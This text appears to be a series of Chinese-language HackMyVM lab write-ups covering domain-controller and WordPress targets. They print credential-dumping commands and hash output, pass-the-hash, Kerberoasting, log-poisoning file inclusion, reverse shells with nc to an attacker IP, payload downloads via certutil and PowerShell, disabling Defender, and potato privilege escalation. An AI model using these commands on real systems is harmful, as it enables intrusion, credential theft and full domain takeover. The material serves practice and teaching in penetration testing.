端口（445）未被占用，且目标域控能访问 Kali 的 IP（网络连通性）。原理：通过 SMB 协议实现文件共享，方便接收从目标导出的备份文件。12.11 导出注册表备份文件通过 impacket-reg 从域控（192.168.219.240）导出 SYSTEM/SAM/SECURITY 注册表文件（含加密的凭证信息）。impacket-reg "soupedecode.local"/"zximena448":"internet"@"192.168.219.240" backup -o '\\192.168.219.37\share'前提：拥有的域用户（zximena448）需具备读取域控注册表的权限（普通用户可能无此权限，此处可能因目标配置宽松成功）。原理：通过远程注册表服务导出系统关键注册表文件。此时smb服务的回显，备份文件，从域控服务器中传过来成功搭建 SMB 共享 + 导出注册表备份目的：SYSTEM/SAM/SECURITY 注册表文件存储了系统加密的凭证（用户哈希、机器账户哈希等），导出后可离线解密。必要性：直接在域控上提取哈希可能触发告警，通过备份文件离线处理更隐蔽。就能看到开启smb共享文件夹的路径下面多了几个文件12.12 用 secretsdump.py 解密备份文件提取本地管理员哈希和机器账户（DC01$）哈希。目的：从备份文件中提取可直接用于攻击的哈希值（如 DC01$ 机器账户哈希、本地管理员哈希）。必要性：原始注册表文件是加密的，必须用 secretsdump 结合 bootKey 解密才能得到可用的哈希。python /usr/share/doc/python3-impacket/examples/secretsdump.py -system SYSTEM.save -sam SAM.save -security SECURITY.save local前提：获取 SYSTEM/SAM/SECURITY 备份文件（本地解密），或拥有目标机器的管理员权限 / 机器账户哈希（远程导出）。原理：利用 Windows 的加密机制，通过 bootKey 解密哈希存储区。┌──(root㉿kali)-[/data/demo] └─# python /usr/share/doc/python3-impacket/examples/secretsdump.py -system SYSTEM.save -sam SAM.save -security SECURITY.save local Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies [*] Target system bootKey: 0x0c7ad5e1334e081c4dfecd5d77cc2fc6 [*] Dumping local SAM hashes (uid:rid:lmhash:nthash) Administrator:500:aad3b435b51404eeaad3b435b51404ee:209c6174da490caeb422f3fa5a7ae634::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: [*] Dumping cached domain logon information (domain/username:hash) [*] Dumping LSA Secrets [*] $MACHINE.ACC $MACHINE.ACC:plain_password_hex:45820dc9be5c067950d71e306d3d14084a9a8a3f8e99d7c1f6074080bec85f7c2645011e654397553bc7cad19277e361caaee722709bdaf3bbcbd9f2d0c73b8cf27651387c664ede1f3f7d6845f7d14293fdbcda34eb89d5c665de89860a23833a531ee43e6841b586896e6dbef6ac4e16196af3c6e2070ca148d032697b02bca95820d079296377ba4df3c4201dd419d89b9357bf470139b53d31761452e0f94ae9273a16c3d43ae2404740b5ac085992a092187c1fc6a59d5edb24e8cd8aae2575639cadc4cc18c7c5e5e07f5bf06a6154bb92a1dbcbf00f5b6b3171cd5df73121e0afca158f50df3f3db64c9dad11 $MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:4408da87fddde5ecdffe27d1d8255bc1 [*] DPAPI_SYSTEM dpapi_machinekey:0x829d1c0e3b8fdffdc9c86535eac96158d8841cf4 dpapi_userkey:0x4813ee82e68a3bf9fec7813e867b42628ccd9503 [*] NL$KM 0000 44 C5 ED CE F5 0E BF 0C 15 63 8B 8D 2F A3 06 8F D........c../... 0010 62 4D CA D9 55 20 44 41 75 55 3E 85 82 06 21 14 bM..U DAuU>...!. 0020 8E FA A1 77 0A 9C 0D A4 9A 96 44 7C FC 89 63 91 ...w......D|..c. 0030 69 02 53 95 1F ED 0E 77 B5 24 17 BE 6E 80 A9 91 i.S....w.$..n... NL$KM:44c5edcef50ebf0c15638b8d2fa3068f624dcad95520444175553e85820621148efaa1770a9c0da49a96447cfc896391690253951fed0e77b52417be6e80a991 [*] Cleaning up...12.13 哈希传递攻击（PTH）目的：无需明文密码，直接用哈希值认证并横向移动到域控（DC01$ 是域控的机器账户，默认有高权限）。必要性：多数情况下无法获取明文密码，PTH 是域内横向的核心手段。前提：目标开启 SMB 服务（445 端口），且未禁用 NTLM 认证（默认启用）。原理：通过 NTLM 协议，用哈希替代明文密码完成认证。用 nxc 验证 DC01$ 哈希的有效性，确认可横向到域控。nxc smb 192.168.219.240 -u target_users.txt -H 4408da87fddde5ecdffe27d1d8255bc1用 DC01$ 哈希通过 secretsdump.py 导出域内所有用户哈希（包括 Administrator）。通过 DC01$ 权限导出域内所有用户哈希（包括 Administrator），最终用管理员权限登录域控，实现对整个域的控制。python /usr/share/doc/python3-impacket/examples/secretsdump.py soupedecode.local/'DC01$'@192.168.219.240 -hashes :4408da87fddde5ecdffe27d1d8255bc112.14 完成渗透用 Administrator 哈希通过 evil-winrm 登录域控，完成渗透。前提：域控开启 WinRM 服务（5985/5986 端口），且拥有管理员级别的哈希或明文密码。原理：通过 WinRM 协议远程执行命令，类似 SSH 但针对 Windows。evil-winrm -i 192.168.219.240 -u Administrator -H 8982babd4da89d33210779a6c5b078bd12.15 总结从用户枚举到密码爆破获取初始凭证，通过AS-REP Roasting获取更高权限账户，利用注册表备份提取机器账户哈希，最终通过哈希传递攻击实现域控完全控制。往期推荐全网首发！HMV全套windows机器提权，域渗透教程，2w字超详细HackMyVm-DC04 ：简单HackMyVm-DC03 ：简单HackMyVm-DC02 ：简单HackMyVm-DC01 ：简单HackMyVm-TriplAdvisor ：简单HackMyVm-Runas ：简单HackMyVm-Always ：简单HackMyVm-Nessus ：简单HackMyVm-Liar ：简单HackMyVm-Simple ：简单HackMyVm-Simple ：简单HackMyVm-Zero ：简单HackMyVm-OMG ：简单新版BurpSuite v2025.6.3汉化版，附激活教程Fine！2025最新款信息收集综合工具若依Vue漏洞检测工具v7更新最好用的下一代目录爆破工具，全方位的目录爆破集成MemProcFS，Vol2和Vol3的内存取证神器重大更新！FeatherScan v4.5 内网 linux 信息收集，提权一键梭哈神器x-waf，一个基于fuzz的waf绕过渗透工具这10款内网穿透工具，一定有你没用过的红队命令速查手册挖SRC必须知道的25个漏洞提交平台挖SRC必须知道的25个漏洞提交平台FeatherScan v4.0 - 一款Linux内网全自动信息收集工具掩日-适用于红队的综合免杀工具2025最新渗透测试靶场推荐近400个渗透测试常用命令，信息收集、web、内网、隐藏通信、域渗透等等【内网渗透】隐藏通信隧道技术内网渗透必备，microsocks，一个轻量级的socks代理工具神器分享 红队快速打点工具-DarKnuclei红日靶场5，windows内网渗透，社工提权，多种域内横向移动思路【渗透测试】DC1~9(全) Linux提权靶机渗透教程，干货w字解析，建议收藏【OSCP】 Kioptrix 提权靶机（1-5）全系列教程，Try Harder！一个永久的渗透知识库【oscp】vulnerable_docker，三种代理方法打入内网【内网渗透】CobaltStrike与MSF联动互相上线的方式内网渗透必备，microsocks，一个轻量级的socks代理工具【OSCP】 Kioptrix 提权靶机（1-5）全系列教程，Try Harder！绝对干货！DC-2综合渗透，rbash逃逸，git提权，wordpress靶场渗透教程【渗透测试】12种rbash逃逸方式总结红日靶场5，windows内网渗透，社工提权，多种域内横向移动思路红日靶场3，joomla渗透，海德拉SMB爆破，域内5台主机横向移动教学不用MSF？红日靶场4，从外网到域控，手工干永恒之蓝，教科书级渗透教学ATK&CK红日靶场二，Weblogic漏洞利用，域渗透攻略sql注入中各种waf的绕过方式，狗，盾，神，锁，宝利用MySQL特性，WAF绕过技巧SQL注入绕过某狗的waf防火墙，这一篇就够了，6k文案超详细大型翻车现场，十种waf绕过姿势，仅成功一种喜欢长文吗？1w字图文带你了解sqlmap，从0到1，WAF绕过，高级用法一文通透

HackMyVm-DC01 ：简单 10.1 信息打点nmap -sS 192.168.53.26 -p- -T4 | grep -E '^[0-9]+/tcp' | awk -F '/' '{print $1}' | tr '\n' ',' | sed 's/,$//'漏洞扫描nmap -sS 192.168.53.26 -p 53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49664,49667,49676,49707,49783 -T4 --script=vuln使用新版enum4linux枚举系统的全部信息enum4linux-ng -A 192.168.53.26 -C10.2 SMB无密登录列出来smb共享文件夹可以匿名登录的共享目录中都没有文件，只能继续信息收集从上面enum4linux-ng枚举结果显示除了SMB服务，还有LDAP以及LDAPS（加密传输，类似于https）服务可达，运行在389/636端口LDAP 是域内 “用户 / 组 / 计算机信息的数据库”，后续有账号就能查域内核心信息（如用户列表、管理员组）。Appears to be root/parent DC：目标可能是”主域控制器“，也就是域控，完整的域名为：SOUPEDECODE.LOCAL域控制器（DC）是域的 “核心”，存储所有域信息（账号、权限、计算机），拿下它就等于控制整个域后续 LDAP 查询（如 ldapsearch）要写 -b "dc=SOUPEDECODE,dc=LOCAL"，Kerberos 攻击要指定 -d SOUPEDECODE.LOCAL，没有这个域名，大部分域操作都无法执行。域的 “短域名” 是 SOUPEDECODE（完整域名是 SOUPEDECODE.LOCAL，短域名是简化版）后续登录域账号时可用短域名（如 SOUPEDECODE\admin）或完整域名（如 admin@SOUPEDECODE.LOCAL），两种格式都支持，短域名更简洁。其中- SOUPEDECODE <1c> - B Domain Controllers代表着 DC01 属于 “域控制器组”，进一步验证它是域控制器，不是普通域内主机。刚刚提到了，使用LDAP查询（如ldapsearch）需要增加一个参数 -b，Kerberos 攻击要指定 -d SOUPEDECODE.LOCAL10.3 ldapsearch那么利用ldapsearch的完整命令就如下ldapsearch -x -H ldap://192.168.53.26 -D '' -w '' -b "dc=SOUPEDECODE,dc=LOCAL" -s base "(objectclass=user)"上面的代码是什么意思呢？其核心”匿名访问被拒绝“各个参数解释如下连接 192.168.53.26 这台 LDAP 服务器（域控制器）；用 匿名方式 访问（-D '' -w '' 表示空用户名、空密码）；查询 dc=SOUPEDECODE,dc=LOCAL 这个节点（域的核心数据节点，存储用户、组等信息）；只查该节点本身（-s base），且只找 “用户类型” 的对象（(objectclass=user)）。为什么报错了？text: 000004DC: LdapErr: DSID-0C090A58, comment: In order to perform this operation a successful bind must be completed on the connection., data 0, v4f7c翻译过来是：“要执行这个操作，必须先在连接上完成‘成功的绑定’（即提供有效的账号密码进行身份验证）”我们想访问的 dc=SOUPEDECODE,dc=LOCAL 节点是域的 “敏感数据区”（存着用户账号、权限等核心信息），域控制器为了安全，禁止匿名用户访问这个区域，必须用 “合法的域账号” 登录后才能查询。如果不加这个-b参数呢，把它去掉，这样就成功了ldapsearch -x -H ldap://192.168.53.26 -D '' -w '' -b '' -s base "(objectclass=user)"这段 ldapsearch 结果包含了 域控制器（192.168.53.26）的核心架构信息我们之前执行的命令指定 -b "dc=SOUPEDECODE,dc=LOCAL"，默认查的是 LDAP 的 “根节点”（-b ""）：根节点只存域的基础架构信息（如域名、支持的协议），不包含敏感数据，所以允许匿名访问，命令能成功；而之前指定的 dc=SOUPEDECODE,dc=LOCAL 是 “核心数据节点”，匿名访问被拒绝，所以报错。这次查询返回的是 LDAP 根节点的配置信息，本质是域控制器 “公开可见的基础架构数据”，包含 5 类关键内容：域的命名结构（域名、目录节点路径）；域功能级别（操作系统版本版本）；支持的协议和认证机制；域控制器的身份标识标识（主机名、角色）；LDAP 服务的配置限制（如最大连接数、查询超时）。10.4 匿名枚举用户的SID解释那么多，渗透到目前收集到的信息，本质就是没有账号密码，获取账号密码可以利用lookupsidfind / -name lookupsid* 2>/dev/nulllookupsid.py 是 Impacket 工具集中的 SID 枚举工具，核心作用是通过 SMB/LDAP 协议查询目标系统的 安全标识符（SID）及其对应账号 / 组信息，在域渗透中常用于 “匿名 / 低权限枚举域内关键账号（如管理员）”，下面枚举soupedecode.local这个域的SID信息，并使用匿名账号和空密码（-no-pass）登录（部分域会禁用匿名登录，这里是一个突破点）python /usr/share/doc/python3-impacket/examples/lookupsid.py soupedecode.local/anonymous@192.168.53.26 -no-pass为什么能列举出来SID？lookupsid.py，通过匿名访问这个域（工具连接域控制器后，会先查询 “域本身的 SID”），通过枚举rid（sid最后一部分），再拼接完整的sid，工具把每个 “完整 SID” 发给域控制器，调用它的 LsaLookupSids2 接口（就像查字典），问：“这个 SID 对应哪个账号？”，这样工具就会返回给你对应的账号信息# 筛选 SidTypeUser 行 → 提取账号名（去掉 SOUPEDECODE\） → 去重 → 保存到 target_users.txt，AI一下就行 grep "SidTypeUser" /data/demo/user | awk -F '\\\\' '{print $2}' | awk '{print $1}' | sort -u > /data/demo/target_users.txt10.5 nxc内网渗透nxc内网渗透神器，进行SMB爆破，但是这里我们是用户和密码都不知道，相当于burpsuite中的集群炸弹攻击，为了减少攻击次数，我们可以使用相同的账号密码，进行攻击，也就是burpsuite中的Pitchfork攻击所以命令如下nxc smb 192.168.53.26 -u target_users.txt -p target_users.txt --no-bruteforce --continue-on-success找到ybob317:ybob317账号密码，继续接下来的渗透，smb登录，照样也没有任何东西换一个USERS，这里面有东西，我们去看看，全部下载下来尝试上传一个文件shell，禁止上传将全部的文件都下载下来recurse ON prompt OFF mget *在ybob317中找到了flag10.6 kerberos攻击服务器上开启了kerberos服务如果目标是 域控制器（DC）（如你之前枚举的 DC01.SOUPEDECODE.LOCAL），则 一定开启了 Kerberos 服务，因为：1、Kerberos 是 Windows 域环境的核心认证协议，用于域内账号登录、服务访问等身份验证；2、域控制器作为 Kerberos 的 “密钥分发中心（KDC）”，必须运行 Kerberos 服务（kdc.exe 进程），否则域功能无法正常工作。impacket-GetUserSPNs -request -dc-ip 192.168.53.26 SOUPEDECODE.LOCAL/ybob317:ybob317通过域用户 ybob317 的凭证，向域控制器（IP：192.168.53.26）查询域内所有关联了 SPN 的用户，并强制请求并获取这些用户的 TGS 票据（Ticket-Granting Service），最终可用于破解用户密码（利用 hashcat 等工具爆破 TGS 票据哈希）。同步时间ntpdate 192.168.53.26将这些内容全部复制到一个名叫”hash“文件中，使用hashcat攻击，爆破出来file_svc用户的密码为Password123!!hashcat -a 0 -m 13100 hash /usr/share/wordlists/rockyou.txt使用smbclient登录smbclient //192.168.53.26/backup -U file_svc Password123!! get backup_extract.txt exit随后使用awk进行筛选awk -F '[:]' '{print $4}' backup_extract.txt > ntml.txtnxc smb 192.168.53.26 -u target_users.txt -H ntml.txt最终账号密码如下FileServer$ ：e41da7e79a4c76dbd9cf79d1cb32555910.7 远程连接evil-winrm -i 192.168.53.26 -u "FileServer$" -H "e41da7e79a4c76dbd9cf79d1cb325559"至此已经拿到了管理员权限，和最后的flag，据说在域中administrator就是系统权限10.8 获取system权限后续如果有兴趣的是否可以利用这个管理员权限提升至系统权限，默认的cmd下载命令不能用，只能用powershell，命令如下Invoke-WebRequest -Uri "http://192.168.53.141:8000/PrivescCheck.ps1" -OutFile "PrivescCheck.ps1" Set-ExecutionPolicy Bypass -Scope process -Force ./PrivescCheck.ps1 # 或者. .\PrivescCheck.ps1 Invoke-PrivescCheck Set-MpPreference -DisableRealtimeMonitoring $true # 关闭杀软 Invoke-WebRequest -Uri "http://192.168.53.141:8000/shell.exe" -OutFile "shell.exe" ./shell.exe # msf生成的马可以看到是能正常上线的扫描出来两个提权漏洞，第二个不能用可以使用第一个，但是没有创建成功会话，由于桥接模式老是自动换ip，就不继续了，另外使用mimikatz.exe也不能正常执行，x86和x64都试过了，后续有做出来的师傅，欢迎添加我好友，一起讨论 + baibaixiaoyu2024exploit/windows/local/ms16_032_secondary_logon_handle_privesc往期推荐全网首发！HMV全套windows机器提权，域渗透教程，2w字超详细HackMyVm-DC04 ：简单HackMyVm-DC03 ：简单HackMyVm-DC02 ：简单HackMyVm-DC01 ：简单HackMyVm-TriplAdvisor ：简单HackMyVm-Runas ：简单HackMyVm-Always ：简单HackMyVm-Nessus ：简单HackMyVm-Liar ：简单HackMyVm-Simple ：简单HackMyVm-Simple ：简单HackMyVm-Zero ：简单HackMyVm-OMG ：简单新版BurpSuite v2025.6.3汉化版，附激活教程Fine！2025最新款信息收集综合工具若依Vue漏洞检测工具v7更新最好用的下一代目录爆破工具，全方位的目录爆破集成MemProcFS，Vol2和Vol3的内存取证神器重大更新！FeatherScan v4.5 内网 linux 信息收集，提权一键梭哈神器x-waf，一个基于fuzz的waf绕过渗透工具这10款内网穿透工具，一定有你没用过的红队命令速查手册挖SRC必须知道的25个漏洞提交平台挖SRC必须知道的25个漏洞提交平台FeatherScan v4.0 - 一款Linux内网全自动信息收集工具掩日-适用于红队的综合免杀工具2025最新渗透测试靶场推荐近400个渗透测试常用命令，信息收集、web、内网、隐藏通信、域渗透等等【内网渗透】隐藏通信隧道技术内网渗透必备，microsocks，一个轻量级的socks代理工具神器分享 红队快速打点工具-DarKnuclei红日靶场5，windows内网渗透，社工提权，多种域内横向移动思路【渗透测试】DC1~9(全) Linux提权靶机渗透教程，干货w字解析，建议收藏【OSCP】 Kioptrix 提权靶机（1-5）全系列教程，Try Harder！一个永久的渗透知识库【oscp】vulnerable_docker，三种代理方法打入内网【内网渗透】CobaltStrike与MSF联动互相上线的方式内网渗透必备，microsocks，一个轻量级的socks代理工具【OSCP】 Kioptrix 提权靶机（1-5）全系列教程，Try Harder！绝对干货！DC-2综合渗透，rbash逃逸，git提权，wordpress靶场渗透教程【渗透测试】12种rbash逃逸方式总结红日靶场5，windows内网渗透，社工提权，多种域内横向移动思路红日靶场3，joomla渗透，海德拉SMB爆破，域内5台主机横向移动教学不用MSF？红日靶场4，从外网到域控，手工干永恒之蓝，教科书级渗透教学ATK&CK红日靶场二，Weblogic漏洞利用，域渗透攻略sql注入中各种waf的绕过方式，狗，盾，神，锁，宝利用MySQL特性，WAF绕过技巧SQL注入绕过某狗的waf防火墙，这一篇就够了，6k文案超详细大型翻车现场，十种waf绕过姿势，仅成功一种喜欢长文吗？1w字图文带你了解sqlmap，从0到1，WAF绕过，高级用法一文通透

Hackmyvm-TriplAdvisor ：简单 9.1 信息打点nmap -sS 192.168.53.243 -p- -T4发现有一个http的域名解析，需要我们在hosts文件中添加好相关的信息nmap -sS 192.168.53.243 -p 445,5985,8080 -T4 -A打开windows的hosts文件，添加如下信息C:\Windows\System32\drivers\etc\hostskali攻击机器中也不能忘了（方便渗透测试，windows中添加只是为了访问，当然也可以配置代理到kali）echo "192.168.53.243 tripladvisor" >> /etc/hosts打开信息收集插件，发现这是一个wordpress内容管理系统wpscan进行可能的用户，后台密码爆破wpscan --url http://tripladvisor:8080/wordpress/ -e u -P /usr/share/wordlists/fasttrack.txtwordpress版本信息已经被扫描出来了再使用详细扫描，发现一个插件wpscan --url http://tripladvisor:8080/wordpress/9.2 漏洞利用漏洞检索searchsploit editor 1.1 wordpress searchsploit -m 44340漏洞信息┌──(root㉿kali)-[/data/demo] └─# cat 44340.txt Product: Site Editor Wordpress Plugin - https://wordpress.org/plugins/site-editor/ Vendor: Site Editor Tested version: 1.1.1 CVE ID: CVE-2018-7422 ** CVE description ** A Local File Inclusion vulnerability in the Site Editor plugin through 1.1.1 for WordPress allows remote attackers to retrieve arbitrary files via the ajax_path parameter to editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php. ** Technical details ** In site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php:5, the value of the ajax_path parameter is used for including a file with PHP’s require_once(). This parameter can be controlled by an attacker and is not properly sanitized. Vulnerable code: if( isset( $_REQUEST['ajax_path'] ) && is_file( $_REQUEST['ajax_path'] ) && file_exists( $_REQUEST['ajax_path'] ) ){ require_once $_REQUEST['ajax_path']; } https://plugins.trac.wordpress.org/browser/site-editor/trunk/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?rev=1640500#L5 By providing a specially crafted path to the vulnerable parameter, a remote attacker can retrieve the contents of sensitive files on the local system. ** Proof of Concept ** http:///wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd ** Solution ** No fix available yet. ** Timeline ** 03/01/2018: author contacted through siteeditor.org's contact form; no reply 16/01/2018: issue report filled on the public GitHub page with no technical details 18/01/2018: author replies and said he replied to our e-mail 8 days ago (could not find the aforementioned e-mail at all); author sends us "another" e-mail 19/01/2018: report sent; author says he will fix this issue "very soon" 31/01/2018: vendor contacted to ask about an approximate release date and if he needs us to postpone the disclosure; no reply 14/02/2018: WP Plugins team contacted; no reply 06/03/2018: vendor contacted; no reply 07/03/2018: vendor contacted; no reply 15/03/2018: public disclosure ** Credits ** Vulnerability discovered by Nicolas Buzy-Debat working at Orange Cyberdefense Singapore (CERT-LEXSI). -- Best Regards, Nicolas Buzy-Debat Orange Cyberdefense Singapore (CERT-LEXSI)存在文件包含漏洞，根据上面的url进行修改http://tripladvisor:8080/wordpress/wp-content/plugins/editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd因为这是windows系统，不存在/etc/passwd，那么怎么快速判断文件是否存在？字典https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/file_inclusion_windows.txt打开bp这里我们上传不了文件（没有账号密码），所以只能包含日志文件c:/xampp/apache/logs/access.log9.3 反弹shell使用curl写入日志，并包含日志文件，尝试获取命令执行结果，结果能正常执行命令┌──(root㉿kali)-[/usr/share/wordlists] └─# curl -A "" http://tripladvisor:8080/wordpress/ ┌──(root㉿kali)-[/usr/share/wordlists] └─# curl "http://tripladvisor:8080/wordpress/wp-content/plugins/editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=c:/xampp/apache/logs/access.log"根据前面传msf马上去的经验，这里就传个nc吧curl -A "" http://tripladvisor:8080/wordpress/ curl -A "" http://tripladvisor:8080/wordpress/ curl "http://tripladvisor:8080/wordpress/wp-content/plugins/editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=\xampp\apache\logs\access.log"切换到当前用户的文件夹，可以看到第一个flag将这个shell利用nc传到msf中，进行本地漏扫（试一试，说不定就出来了呢，虽然它只在meterpreter后渗透模块中生效）nc.exe 192.168.53.51 1234 -e cmd9.4 msf内核漏扫msfconsole use exploit/multi/handler # 加载handler模块 # 根据目标系统选择payload（nc反弹的是基础shell，非meterpreter） # 目标是Windows，接收nc命令反弹的shell： set PAYLOAD windows/shell_reverse_tcp set LHOST 192.168.53.51 # 攻击机IP（与nc反弹目标一致） set LPORT 1234 # 监听端口（与nc反弹端口一致） run -j # 启动监听，保持后台执行 use multi/recon/local_exploit_suggester # 使用本地提权漏扫模块，估计这里没效果，目前测试只有meterpreter模块反弹的shell能用 set session 1 # 设置反弹成功的会话id为1，使用 sessions 即可查看所有的会话id9.5 土豆提权certutil.exe -urlcache -split -f http://192.168.53.51:8000/GodPotato-NET2.exe certutil.exe -urlcache -split -f http://192.168.53.51:8000/GodPotato-NET35.exe certutil.exe -urlcache -split -f http://192.168.53.51:8000/GodPotato-NET4.exe失败.\GodPotato-NET4.exe -cmd "cmd /c whoami" .\GodPotato-NET35.exe -cmd "cmd /c whoami" .\GodPotato-NET2.exe -cmd "cmd /c whoami"9.6 JuicyPotato提权certutil.exe -urlcache -split -f http://192.168.53.51:8000/JuicyPotato.exe certutil.exe -urlcache -split -f http://192.168.53.51:8000/CLSID/Windows_Server_2008_R2_Enterprise/CLSID.listhttps://github.com/ohpe/juicy-potato/blob/master/CLSID/Windows_Server_2008_R2_Enterprise/CLSID.list然后用这个工具测试certutil.exe -urlcache -split -f http://192.168.53.51:8000/juicy-potato/Test/test_clsid.bat此时你的靶机上应该要有这三个文件此时验证一下，能否正常访问administrotar的文件，结果为拒绝访问（因为靶机限制了我不能使用whoami，所以只能这样验证）回到目录，执行此文件随便选择一个系统权限的clsid最终提权命令如下，kali记得开ncJuicyPotato.exe -l 1337 -c "{4991d34b-80a1-4291-83b6-3328366b9097}" -p c:\windows\system32\cmd.exe -a "/c C:\xampp\htdocs\wordpress\wp-content\plugins\editor\editor\extensions\pagebuilder\includes\nc.exe 192.168.53.51 4444 -e cmd.exe" -t *此时就可以访问管理员的文件了往期推荐全网首发！HMV全套windows机器提权，域渗透教程，2w字超详细HackMyVm-DC04 ：简单HackMyVm-DC03 ：简单HackMyVm-DC02 ：简单HackMyVm-DC01 ：简单HackMyVm-TriplAdvisor ：简单HackMyVm-Runas ：简单HackMyVm-Always ：简单HackMyVm-Nessus ：简单HackMyVm-Liar ：简单HackMyVm-Simple ：简单HackMyVm-Simple ：简单HackMyVm-Zero ：简单HackMyVm-OMG ：简单新版BurpSuite v2025.6.3汉化版，附激活教程Fine！2025最新款信息收集综合工具若依Vue漏洞检测工具v7更新最好用的下一代目录爆破工具，全方位的目录爆破集成MemProcFS，Vol2和Vol3的内存取证神器重大更新！FeatherScan v4.5 内网 linux 信息收集，提权一键梭哈神器x-waf，一个基于fuzz的waf绕过渗透工具这10款内网穿透工具，一定有你没用过的红队命令速查手册挖SRC必须知道的25个漏洞提交平台挖SRC必须知道的25个漏洞提交平台FeatherScan v4.0 - 一款Linux内网全自动信息收集工具掩日-适用于红队的综合免杀工具2025最新渗透测试靶场推荐近400个渗透测试常用命令，信息收集、web、内网、隐藏通信、域渗透等等【内网渗透】隐藏通信隧道技术内网渗透必备，microsocks，一个轻量级的socks代理工具神器分享 红队快速打点工具-DarKnuclei红日靶场5，windows内网渗透，社工提权，多种域内横向移动思路【渗透测试】DC1~9(全) Linux提权靶机渗透教程，干货w字解析，建议收藏【OSCP】 Kioptrix 提权靶机（1-5）全系列教程，Try Harder！一个永久的渗透知识库【oscp】vulnerable_docker，三种代理方法打入内网【内网渗透】CobaltStrike与MSF联动互相上线的方式内网渗透必备，microsocks，一个轻量级的socks代理工具【OSCP】 Kioptrix 提权靶机（1-5）全系列教程，Try Harder！绝对干货！DC-2综合渗透，rbash逃逸，git提权，wordpress靶场渗透教程【渗透测试】12种rbash逃逸方式总结红日靶场5，windows内网渗透，社工提权，多种域内横向移动思路红日靶场3，joomla渗透，海德拉SMB爆破，域内5台主机横向移动教学不用MSF？红日靶场4，从外网到域控，手工干永恒之蓝，教科书级渗透教学ATK&CK红日靶场二，Weblogic漏洞利用，域渗透攻略sql注入中各种waf的绕过方式，狗，盾，神，锁，宝利用MySQL特性，WAF绕过技巧SQL注入绕过某狗的waf防火墙，这一篇就够了，6k文案超详细大型翻车现场，十种waf绕过姿势，仅成功一种喜欢长文吗？1w字图文带你了解sqlmap，从0到1，WAF绕过，高级用法一文通透